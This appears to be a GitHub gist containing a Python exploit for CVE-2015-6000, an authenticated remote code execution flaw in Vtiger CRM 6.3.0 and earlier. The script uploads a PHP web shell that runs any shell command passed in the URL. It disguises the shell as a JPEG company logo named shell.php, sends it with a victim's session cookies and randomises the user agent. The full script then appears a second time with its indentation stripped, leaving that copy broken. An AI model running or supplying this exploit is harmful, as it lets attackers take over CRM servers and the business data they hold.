dorosch/cve-2015-6000.py

## cve-2015-6000.py
#!/usr/bin/env python
"""
Vtiger CRM 6.3.0 - Authenticated Remote Code Execution

Version: 6.3.0 (and lower)
Tested on: Linux (Ubuntu)
CVE: CVE-2015-6000
"""
from __future__ import print_function
import argparse
import sys
import io
import random
try:
    import httplib
except ImportError:
    import http.client as httplib


def payload():
    """Standard single-line shell."""
    return '<? echo shell_exec($_GET[\'cmd\']); ?>'


def argument_parser():
    """Parses command-line arguments."""
    parser = argparse.ArgumentParser()

    parser.add_argument('--host', required=True, help='Target host')
    parser.add_argument('--port', default=80, type=int, help='Target port')
    parser.add_argument('--payload', default=payload(), help='Custom payload')
    parser.add_argument('--cookie', required=True, help='Authorized cookies')

    return parser.parse_args(sys.argv[1:])


class UserAgent(object):
    list = [
        'Opera/7.50 (Windows XP; U)',
        'Opera/9.25 (Windows NT 6.0; U; en)',
        'Opera/7.51 (Windows NT 5.1; U) [en]',
        'Mozilla/4.8 [en] (Windows NT 6.0; U)',
        'Mozilla/4.8 [en] (Windows NT 5.1; U)',
        'Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/125.8',
        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)  Safari/85.8',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0',
        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) OmniWeb/v563.15'
    ]


class MultiPartForm(object):
    """
    Accumulate the data to be used when posting a form. Original:
    https://blog.thesparktree.com/the-unfortunately-long-story-dealing-with
    """

    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = '---------------------------51732462825208'

    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

    def add_field(self, name, value):
        self.form_fields.append((name, value))

    def add_file(self, fieldname, filename, content):
        self.files.append((fieldname, filename, 'image/jpeg', content))

    def get_binary(self):
        binary = io.BytesIO()
        needsCLRF = False

        # Add the form fields
        for name, value in self.form_fields:
            if needsCLRF:
                binary.write('\r\n')
            needsCLRF = True

            block = [self.boundary,
                'Content-Disposition: form-data; name="%s"' % name,
                '',
                value
            ]
            binary.write('\r\n'.join(block))

        # Add the files to upload
        for field_name, filename, content_type, body in self.files:
            if needsCLRF:
                binary.write('\r\n')
            needsCLRF = True

            block = [self.boundary,
                str('Content-Disposition: file; name="%s"; filename="%s"' % \
                (field_name, filename)),
                'Content-Type: %s' % content_type,
                ''
            ]
            binary.write('\r\n'.join(block))
            binary.write('\r\n')
            binary.write(body)

        # add closing boundary marker,
        binary.write('\r\n--' + self.boundary + '--\r\n')

        return binary


def exploit():
    args = argument_parser()
    form = MultiPartForm()

    form.add_field('__vtrftk', 'sid:c8c896d0d11ba83f6cde923ca4d74161a250d78d,1506431507')
    form.add_field('module', 'Vtiger')
    form.add_field('parent', 'Settings')
    form.add_field('action', 'CompanyDetailsSave')
    form.add_field('saveButton', '')
    form.add_file('logo', 'shell.php', args.payload)

    body = form.get_binary().getvalue()

    headers = {
        'User-Agent': random.choice(UserAgent.list),
        'Content-Length': len(body),
        'Cookie': args.cookie,
        'Content-Type': form.get_content_type(),
    }

    connection = httplib.HTTPConnection(args.host, args.port)
    connection.request('POST', '/index.php', body, headers)
    response = connection.getresponse()
    connection.close()

    if response.status == 302:
        print ('[+] exploit upload')
    else:
        print ('[-] exploit can\'t upload')

    print (response.read())


if __name__ == '__main__':
    exploit()
	#!/usr/bin/env python
	"""
	Vtiger CRM 6.3.0 - Authenticated Remote Code Execution

	Version: 6.3.0 (and lower)
	Tested on: Linux (Ubuntu)
	CVE: CVE-2015-6000
	"""
	from __future__ import print_function
	import argparse
	import sys
	import io
	import random
	try:
	import httplib
	except ImportError:
	import http.client as httplib



	def payload():
	"""Standard single-line shell."""
	return '<? echo shell_exec($_GET[\'cmd\']); ?>'


	def argument_parser():
	"""Parses command-line arguments."""
	parser = argparse.ArgumentParser()

	parser.add_argument('--host', required=True, help='Target host')
	parser.add_argument('--port', default=80, type=int, help='Target port')
	parser.add_argument('--payload', default=payload(), help='Custom payload')
	parser.add_argument('--cookie', required=True, help='Authorized cookies')

	return parser.parse_args(sys.argv[1:])


	class UserAgent(object):
	list = [
	'Opera/7.50 (Windows XP; U)',
	'Opera/9.25 (Windows NT 6.0; U; en)',
	'Opera/7.51 (Windows NT 5.1; U) [en]',
	'Mozilla/4.8 [en] (Windows NT 6.0; U)',
	'Mozilla/4.8 [en] (Windows NT 5.1; U)',
	'Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)',
	'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
	'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/125.8',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/85.8',
	'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) OmniWeb/v563.15'
	]


	class MultiPartForm(object):
	"""
	Accumulate the data to be used when posting a form. Original:
	https://blog.thesparktree.com/the-unfortunately-long-story-dealing-with
	"""

	def __init__(self):
	self.form_fields = []
	self.files = []
	self.boundary = '---------------------------51732462825208'

	def get_content_type(self):
	return 'multipart/form-data; boundary=%s' % self.boundary

	def add_field(self, name, value):
	self.form_fields.append((name, value))

	def add_file(self, fieldname, filename, content):
	self.files.append((fieldname, filename, 'image/jpeg', content))

	def get_binary(self):
	binary = io.BytesIO()
	needsCLRF = False

	# Add the form fields
	for name, value in self.form_fields:
	if needsCLRF:
	binary.write('\r\n')
	needsCLRF = True

	block = [self.boundary,
	'Content-Disposition: form-data; name="%s"' % name,
	'',
	value
	]
	binary.write('\r\n'.join(block))

	# Add the files to upload
	for field_name, filename, content_type, body in self.files:
	if needsCLRF:
	binary.write('\r\n')
	needsCLRF = True

	block = [self.boundary,
	str('Content-Disposition: file; name="%s"; filename="%s"' % \
	(field_name, filename)),
	'Content-Type: %s' % content_type,
	''
	]
	binary.write('\r\n'.join(block))
	binary.write('\r\n')
	binary.write(body)

	# add closing boundary marker,
	binary.write('\r\n--' + self.boundary + '--\r\n')

	return binary


	def exploit():
	args = argument_parser()
	form = MultiPartForm()

	form.add_field('__vtrftk', 'sid:c8c896d0d11ba83f6cde923ca4d74161a250d78d,1506431507')
	form.add_field('module', 'Vtiger')
	form.add_field('parent', 'Settings')
	form.add_field('action', 'CompanyDetailsSave')
	form.add_field('saveButton', '')
	form.add_file('logo', 'shell.php', args.payload)

	body = form.get_binary().getvalue()

	headers = {
	'User-Agent': random.choice(UserAgent.list),
	'Content-Length': len(body),
	'Cookie': args.cookie,
	'Content-Type': form.get_content_type(),
	}

	connection = httplib.HTTPConnection(args.host, args.port)
	connection.request('POST', '/index.php', body, headers)
	response = connection.getresponse()
	connection.close()

	if response.status == 302:
	print ('[+] exploit upload')
	else:
	print ('[-] exploit can\'t upload')

	print (response.read())



	if __name__ == '__main__':
	exploit()